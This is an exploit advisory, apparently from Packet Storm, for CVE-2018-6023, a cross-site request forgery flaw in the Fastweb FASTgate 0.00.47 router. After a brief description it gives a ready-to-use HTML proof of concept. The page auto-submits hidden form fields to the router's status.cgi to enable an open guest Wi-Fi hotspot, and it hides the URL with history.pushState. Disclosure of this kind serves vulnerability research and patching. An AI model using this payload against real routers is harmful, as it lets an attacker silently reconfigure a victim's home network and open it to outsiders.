Fastweb FASTGate version 0.00.47 suffers from a cross site request forgery vulnerability.
582a856cf74eb749a085f4019325624fbaa58c9f73dd3fa29407129743f496f1# Exploit Title: Fastweb FASTgate 0.00.47 CSRF
# Date: 09-05-2018
# Exploit Authors: Raffaele Sabato
# Contact: https://twitter.com/syrion89
# Vendor: Fastweb
# Product Web Page: http://www.fastweb.it/adsl-fibra-ottica/dettagli/modem-fastweb-fastgate/
# Version: 0.00.47
# CVE: CVE-2018-6023
I DESCRIPTION
========================================================================
An issue was discovered in Fastweb FASTgate 0.00.47 device. A Cross-site
request forgery (CSRF) vulnerability allows remote attackers to hijack the
authentication of users for requests that modify the configuration.
This vulnerability may lead to Gues Wi-Fi activating, Wi-Fi password
changing, etc.
II PROOF OF CONCEPT
========================================================================
## Activate Gues Wi-Fi:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.254/status.cgi">
<input type="hidden" name="_" value="1516312144136" />
<input type="hidden" name="act" value="nvset" />
<input type="hidden" name="hotspot_broadcast_ssid" value="1" />
<input type="hidden" name="hotspot_enable" value="1" />
<input type="hidden" name="hotspot_filtering" value="all" />
<input type="hidden" name="hotspot_security" value="WPA2PSK" />
<input type="hidden" name="hotspot_ssid" value="GUEST-Test" />
<input type="hidden" name="hotspot_timeout" value="-1" />
<input type="hidden" name="service" value="wl_guestaccess" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
III REFERENCES
========================================================================
http://www.fastweb.it/myfastpage/assistenza/guide/FASTGate/
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed